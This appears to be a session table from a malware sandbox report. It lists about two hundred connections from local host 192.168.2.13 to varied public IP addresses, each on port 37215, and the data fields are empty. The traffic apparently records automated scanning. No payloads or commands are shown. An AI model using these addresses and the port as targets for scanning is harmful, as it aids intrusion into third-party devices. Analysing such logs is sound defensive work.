                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18294192.168.2.1360242157.173.89.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18295192.168.2.1360930157.62.101.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18296192.168.2.1344404197.101.2.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18297192.168.2.1341648157.15.76.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18298192.168.2.134293641.163.240.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18299192.168.2.1355548197.115.231.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18300192.168.2.1353022157.182.255.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18301192.168.2.1352462157.103.209.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18302192.168.2.1360680159.196.203.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18303192.168.2.134600441.197.153.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18304192.168.2.135448841.157.33.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18305192.168.2.1355474157.196.47.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18306192.168.2.1355312197.98.57.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18307192.168.2.134882041.244.11.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18308192.168.2.134405441.24.39.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18309192.168.2.1345398197.158.177.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18310192.168.2.134454641.246.183.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18311192.168.2.134032841.61.84.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18312192.168.2.136027641.30.100.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18313192.168.2.135630269.17.120.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18314192.168.2.1338916175.182.240.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18315192.168.2.1355102183.220.82.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18316192.168.2.1349392153.16.200.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18317192.168.2.134599241.46.18.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18318192.168.2.1354776197.36.50.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18319192.168.2.1335076149.101.60.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18320192.168.2.1359896138.178.162.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18321192.168.2.1360788197.112.36.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18322192.168.2.1339706197.207.235.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18323192.168.2.1356490166.13.72.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18324192.168.2.1354412197.140.161.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18325192.168.2.136084041.201.72.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18326192.168.2.1355082200.169.4.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18327192.168.2.1344960157.164.215.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18328192.168.2.134423240.23.187.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18329192.168.2.1342170197.101.212.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18330192.168.2.135624841.248.139.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18331192.168.2.1347734197.254.88.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18332192.168.2.134727641.58.46.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18333192.168.2.1341630157.164.202.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18334192.168.2.135170241.81.29.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18335192.168.2.1336032197.168.198.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18336192.168.2.1350624157.231.131.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18337192.168.2.1357332130.183.86.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18338192.168.2.1334552208.245.90.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18339192.168.2.134425272.18.23.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18340192.168.2.135513041.34.40.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18341192.168.2.1347790217.74.105.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18342192.168.2.135413257.96.205.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18343192.168.2.1340988197.236.55.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18344192.168.2.1358654197.5.153.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18345192.168.2.1348264197.248.155.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18346192.168.2.134824841.140.214.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18347192.168.2.135770241.14.196.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18348192.168.2.134915241.214.243.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18349192.168.2.1339478197.98.165.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18350192.168.2.134273434.126.250.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18351192.168.2.135251041.21.79.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18352192.168.2.1358274157.48.55.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18353192.168.2.1340484202.128.93.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18354192.168.2.134946241.127.90.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18355192.168.2.135999841.232.142.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18356192.168.2.1348640197.35.30.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18357192.168.2.1360964178.149.63.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18358192.168.2.1338506195.102.78.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18359192.168.2.1342728157.226.134.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18360192.168.2.134328641.195.117.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18361192.168.2.1339086157.21.161.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18362192.168.2.134687241.21.221.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18363192.168.2.1333754203.238.42.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18364192.168.2.135829641.195.211.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18365192.168.2.1340216197.152.244.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18366192.168.2.1355236197.146.54.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18367192.168.2.134169654.243.49.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18368192.168.2.1348428180.118.50.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18369192.168.2.1347556157.103.87.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18370192.168.2.134916441.16.214.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18371192.168.2.135153841.144.172.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18372192.168.2.1353224197.93.118.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18373192.168.2.1350148197.37.62.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18374192.168.2.1359378157.192.189.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18375192.168.2.134800441.76.230.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18376192.168.2.133478041.223.65.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18377192.168.2.135877441.178.47.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18378192.168.2.133409441.193.241.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18379192.168.2.1356658157.12.195.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18380192.168.2.1347048157.165.201.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18381192.168.2.1346878157.73.48.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18382192.168.2.1358458157.172.223.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18383192.168.2.134827041.130.78.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18384192.168.2.135178441.131.232.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18385192.168.2.135728023.51.136.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18386192.168.2.1345732157.70.43.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18387192.168.2.1333448157.168.67.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18388192.168.2.1359568157.108.245.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18389192.168.2.1334472197.160.155.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18390192.168.2.1336324197.121.171.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18391192.168.2.1339764157.148.139.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18392192.168.2.1351314197.28.132.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18393192.168.2.1345856157.87.69.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18394192.168.2.1341356197.71.151.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18395192.168.2.1343418100.223.71.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18396192.168.2.133637449.59.201.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18397192.168.2.134786041.231.208.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18398192.168.2.1349314197.75.242.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18399192.168.2.1333144157.75.95.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18400192.168.2.1351706197.35.119.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18401192.168.2.136009838.21.167.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18402192.168.2.135049441.57.154.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18403192.168.2.1347868197.86.161.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18404192.168.2.134725841.144.239.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18405192.168.2.134232865.106.180.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18406192.168.2.1346860157.36.90.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18407192.168.2.1352530157.66.151.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18408192.168.2.135952641.115.98.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18409192.168.2.135270441.69.161.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18410192.168.2.1343244157.126.167.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18411192.168.2.1339272157.159.236.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18412192.168.2.1343996157.30.40.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18413192.168.2.1356136197.192.210.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18414192.168.2.1343260157.109.218.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18415192.168.2.1354744197.251.244.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18416192.168.2.133993841.230.28.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18417192.168.2.1341372157.90.132.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18418192.168.2.1337852197.21.183.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18419192.168.2.1355896157.137.142.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18420192.168.2.1349192197.6.181.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18421192.168.2.1338338197.104.73.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18422192.168.2.1353418197.234.169.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18423192.168.2.1336712157.2.198.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18424192.168.2.136014041.107.47.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18425192.168.2.133625441.44.37.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18426192.168.2.1350746157.40.248.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18427192.168.2.135848881.58.252.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18428192.168.2.133335687.151.60.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18429192.168.2.1339422197.192.181.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18430192.168.2.1360232197.46.101.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18431192.168.2.1355832157.18.150.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18432192.168.2.135263479.177.150.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18433192.168.2.1336844157.164.79.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18434192.168.2.1339644157.252.21.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18435192.168.2.1337828197.160.215.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18436192.168.2.133493614.184.240.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18437192.168.2.1341730197.228.80.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18438192.168.2.135270841.73.166.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18439192.168.2.1352112157.1.38.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18440192.168.2.1355242157.92.46.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18441192.168.2.133737461.100.166.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18442192.168.2.1338664163.130.11.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18443192.168.2.1352080157.212.158.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18444192.168.2.1349358157.208.62.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18445192.168.2.1338892197.179.207.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18446192.168.2.1344512197.190.94.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18447192.168.2.135437241.167.210.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18448192.168.2.135676841.172.156.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18449192.168.2.134929241.224.174.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18450192.168.2.133831041.255.143.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18451192.168.2.1339700197.37.90.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18452192.168.2.1340512197.237.242.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18453192.168.2.1356516157.213.36.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18454192.168.2.135816641.19.174.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18455192.168.2.1338568197.67.150.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18456192.168.2.1341254103.67.93.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18457192.168.2.1352190197.189.234.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18458192.168.2.1351610157.30.197.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18459192.168.2.1345844157.249.94.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18460192.168.2.1350984197.11.228.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18461192.168.2.135855241.134.87.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18462192.168.2.133525254.211.238.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18463192.168.2.1333850101.171.251.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18464192.168.2.1335488157.121.14.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18465192.168.2.133344860.133.141.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18466192.168.2.1333092157.84.224.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18467192.168.2.1335412197.243.35.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18468192.168.2.134083296.114.161.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18469192.168.2.1333200118.212.123.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18470192.168.2.133339675.132.95.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18471192.168.2.1359532104.143.236.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18472192.168.2.1358086157.73.133.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18473192.168.2.135982641.167.214.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18474192.168.2.1343848157.241.0.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18475192.168.2.1352024157.82.112.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18476192.168.2.135482471.188.52.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18477192.168.2.133309091.91.186.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18478192.168.2.1334242197.222.61.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18479192.168.2.134094039.66.206.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18480192.168.2.133401082.61.164.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18481192.168.2.1352186157.137.7.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18482192.168.2.1357270157.9.29.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18483192.168.2.133864641.178.208.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18484192.168.2.135038841.225.130.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18485192.168.2.133467041.87.252.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18486192.168.2.1346272157.122.184.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18487192.168.2.1345420197.140.67.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18488192.168.2.1350646157.36.169.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18489192.168.2.1336540131.108.55.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18490192.168.2.1356952157.223.27.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18491192.168.2.1346118197.62.86.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18492192.168.2.136046441.225.125.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18493192.168.2.1337164197.44.81.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18494192.168.2.134541441.133.195.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18495192.168.2.1345312197.56.148.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18496192.168.2.134520864.56.150.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18497192.168.2.1359634157.100.199.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18498192.168.2.136096241.86.241.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18499192.168.2.1332836115.136.167.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18500192.168.2.1333944168.141.86.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18501192.168.2.134801041.92.92.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18502192.168.2.134258441.209.61.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
